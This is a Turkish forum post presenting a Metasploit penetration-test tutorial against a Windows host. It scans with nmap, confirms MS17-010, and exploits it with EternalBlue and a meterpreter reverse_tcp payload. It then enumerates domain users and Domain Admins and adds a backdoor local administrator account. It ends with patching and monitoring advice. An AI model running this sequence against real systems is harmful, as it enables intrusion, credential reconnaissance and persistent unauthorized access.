Best Studio 1
Best Studio
D 1
delimuratt
Aliyldrim 1
Aliyldrim
Mt2Hizmet 1
Mt2Hizmet
noisiv 1
noisiv
Manwe Work 1
Manwe Work
melankolıa18 1
melankolıa18
Agora Metin2 1
Agora Metin2
Cannn6161 1
Cannn6161
kralhakan2009 1
kralhakan2009
Vahsi Uzman 1
Vahsi Uzman
Hikaye Ekle
Reklam vermek için turkmmo@gmail.com

Altın Konu [Windows 11] ` Kali Metasploit ile Sızma Testi

5.00 yıldız(lar) 1 Değerlendirme Değerlendirenler

EsatOfficial

Kara Gül ... 🥀
Telefon Numarası Onaylanmış Üye TC Kimlik Numarası Doğrulanmış Üye
TM Üye
Katılım
19 Ara 2020
Konular
1,566
Mesajlar
6,953
Çözüm
12
Online süresi
2mo 25d
Reaksiyon Skoru
2,468
Altın Konu
122
TM Yaşı
5 Yıl 5 Ay 17 Gün
Başarım Puanı
282
MmoLira
-119
DevLira
80
Ticaret - 0%
0   0   0

ROHAN2 WORLD 1-120 TR TİPİ OFFICIAL YOHARA, BALATHOR VE AMON! 80. GÜNÜNDE! +10.000 ONLİNE! HİLE VE BOT %100 ENGELLİ HEMEN TIKLA!

Hedef bilgisayarın zafiyetlerini görebilmek için NMAP tool’unu kullanacağım.

image-211.png
image-212.png

Nmap ile hedef bilgisayara ulaşabilirliğimi kontrol edilyorum.

Ping 1.1.1.4

image-213.png

Nmap 1.1.1.4 komutunu kullanıyorum ve hedef bilgisayarda erişebileceğim port’ları görebiliyorum.

image-214.png

445/tcp Microsoft-ds port’unu kullanacağım.

MS17-010 update’inin hedef bilgisayar da kontrolünü aşağıdaki komut ile yapıyorum.

Nmap -p445 –script smb-vuln-ms17-010 1.1.1.4

image-215.png

Komutumuzun çalışması sonucunda MS17-010 açığının olduğunu tespit ediyorum. Hedef bilgisayar da windows güncellemelerinin tam olarak yapılmadığını göryorum

Bu aşamada Vulnerability Analiz aşamasını tamamlamış oluyoruz ve Metaspolit ile Sızma Testi aşamasına geçiyoruz.

Metaspolit aşağıdaki gibi çalıştırılır.

image-216.png
image-217.png

Aşağıdaki komutlar kullanılarak sızma testine devam ediyorum.

Use exploit/windows/smb/ms17_010_eternalblue

Set rhost 1.1.1.4

Set payload windows/x64/meterpreter/reverse_tcp

Set lhost 1.1.1.3


image-219.png

Show Options komutu kullanarak girilen bilgileri kontrol ediyorum.

image-220.png

Exploit yada Run komutu kullanılarak hedef sisteme erişim sağlıyorum.

image-221.png

Sysinfo komutu ile hedef system hakkında bilgileri görebiliyorum.

image-222.png

Shell komutu kullanarak hedef makina da shell açıyorum ve Dır komutu kullanarak dosya ve dizinleri listeliyorum.

image-223.png

Whoami /all komutu kullanarak “SYSTEM” account ile oturum açtığımı görüyorum.

image-224.png

Ipconfig /all komutu kullanarak hedef makinanın bulunduğu domain’in adını ve DC’nin adını tespit ediyorum.

image-225.png
image-226.png

Net user /domain komutu kullanarak hedef bilgisayarın bulunduğu domain deki tüm kullanıcıların listesini alıyorum.

image-227.png

Net groups “domain admins” /domain komutu ile “Domain Admins” grubunun üyelerini listeliyorum.

image-228.png

Net user volkan /domain komutu ile domain admin olan Volkan user’ının attribute’lerini görüntülüyorum. Yani en son oturum açma, parola değiştirme zamanı bilgilerine ulaşabiliyorum.

image-229.png

Net user /add GaziEtikHacker Gazi246135* komutu ile GaziEtikHacker isimli bir kullanıcı oluşturuyorum.

image-230.png

Net localgroup “administrators” GaziEtikHacker /add komutu ile oluşturmuş olduğum kullanıcıyı hedef bilgisayarın administrators (local admins) grubuna ekleyerek, hedef bilgisayar da en yüksek yetkilere sahip bir kullanıcım oluyor.

image-231.png



N O T: Kesinlikle bilgisayarlarımızı güncel tutmalıyız, Windows güncellemelerini zamanın da ve tam olarak yapmalıyız . Ayrıca bilgisayarımız da bulunan tüm uygulamalarında güncellemelerini yapmalıyız.

———————————————————————————————————————————————

  • ATA yada Azure ATP kullanınız.
  • PAW (high secure workstation) kullanınız.
  • Anti virüs + EDR + Malware Detection kullanınız.
  • Aduit Log’ların doğru konfigüre edildiğinden ve aktif olduğundan emin olunuz.
 
Paylaşım için teşekkürler :)
 
Anlatım için teşekkürler :)
 

Şu an konuyu görüntüleyenler (Toplam : 0, Üye: 0, Misafir: 0)

Geri
Üst